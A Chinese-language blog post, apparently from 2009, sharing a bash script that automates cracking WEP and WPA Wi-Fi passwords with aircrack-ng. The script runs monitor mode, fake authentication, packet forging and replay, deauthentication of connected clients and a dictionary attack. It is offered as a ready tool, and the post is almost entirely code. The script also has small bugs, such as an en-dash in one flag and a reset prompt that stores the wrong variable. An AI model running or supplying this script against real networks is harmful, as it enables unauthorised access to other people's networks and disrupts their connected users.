破解wep/wap脚本

将之前破解wep脚本进行了完善,添加了破解wap的代码。

脚本放在google doc了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
gentoo-pjq 320 # cat crack.sh
#########################################################################
# Author: pengjianqing@gmail.com
# Created Time: Fri 09 Oct 2009 09:37:43 PM CST
# File Name: crack.sh
# Description:Welcome to visit:www.impjq.net for more information.
#Referece:http://www.cbifamily.com/hard/harddim/2009-05-13/1242203280d86121.html
#########################################################################
#!/bin/bash
 
#Settings
CHANNEL=6
TMP=tmp.txt
PASSWDTXT=/media/sdb9/superdic.txt
ENCRYPTTYPE=64
 
 
clean()
{
    rm *.cap
    rm fragment*.xor
    rm *.ivs
    rm *.csv
    rm ${TMP}
    rm *.netxml
}
 
 
 
getwepkey()
{
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    echo "Get the key:"
    ls -lht *.ivs
    read -p "Input the pack file name,like:crackwep-01.ivs" RESULT
    echo "aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}"
    aircrack-ng -n ${ENCRYPTTYPE} -b ${AP_MAC} ${RESULT}
}
 
crackwep()
{
    echo "Now choose crackwep()"
    echo "Display the details on the Channel:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "use tail -f ${TMP} to see the details"
    airodump-ng --ivs -w crackwep -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}
 
    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"
 
    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"
 
    echo "欺骗模式:aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0
    read -p "Association successful?:(y/n):" RESULT
 
    echo "aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0
 
    echo "check whether create the fragment-xxxx-xxxx.xor file?"
    ls -lht *.xor
 
    read -p "Create the fragment-xxxx-xxxx.xor file?(y/n):" RESULT
 
    echo "packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp"
    packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp
 
 
    echo "**************************************************************************"
    echo "Now you should run:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP} "
    echo "to check the #Data  grow to 10000"
    echo "**************************************************************************"
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    echo "aireplay-ng -2 -r mrarp -x 256 mon0"
    aireplay-ng -2 -r mrarp -x 256 mon0
 
#    getwepkey
}
 
 
crackwap()
{
    echo "Now choose crackwap()"
    echo "**************************************************************************"
    echo "Display the details on the Channel:airodump-ng  -w crackwap -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "**************************************************************************"
    echo "NOTE:Your should start this in another terminal:airodump-ng -w crackwap -c ${CHANNEL} mon0"
    echo "**************************************************************************"
    echo "use tail -f ${TMP} to see the details"
    echo airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}
 
    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"
 
    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"
 
    STATION_MAC=`grep ${AP_MAC}  ${TMP}|sort|uniq|cut -d " " -f4|head -n 1`
    echo "STATION_MAC:${STATION_MAC}"
 
    read -p "All the MAC is right?(y/n):" RESULT
 
 
    case "${RESULT}" in
	"y" ) ;;
	"n" ) echo "Reset the MAC:";read -p "AP_MAC:" PC_MAC;read -p "STATION_MAC:" STATION_MAC;;
 
	*   ) echo "Wrong selection";;
    esac
 
 
    echo "aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0"
    aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0
 
    read -p "Get the *.cab file ok?(y/n):" RESULT
 
    echo "Now Crack the WAP with ${PASSWDTXT}"
    echo "aircrack-ng -w ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap"
    aircrack-ng –w  ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap
}
 
menu()
{
    echo "Main Menu"
    echo "Please choose your action:"
    echo "1.wep"
    echo "2.wap"
    echo "q.quit"
}
 
clean
echo "start wlan0 monitor:airmon-ng start wlan0 ${CHANNEL}"
airmon-ng stop mon0
airmon-ng start wlan0 ${CHANNEL}
echo "airmon-ng"
read -p "start monitor ok:y/n?:" RESULT
 
 
menu
read -p "Please choose:" CHOOSE
 
 
while [ "${CHOOSE}" != "q" ];do
    case "${CHOOSE}" in
	"1" ) crackwep;;
	"2" ) crackwap;;
	"q" ) exit 0;;
 
	*   ) echo "Wrong selection";;
    esac
    menu
    read -p "Please Select:" CHOOSE
    clear
 
done

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.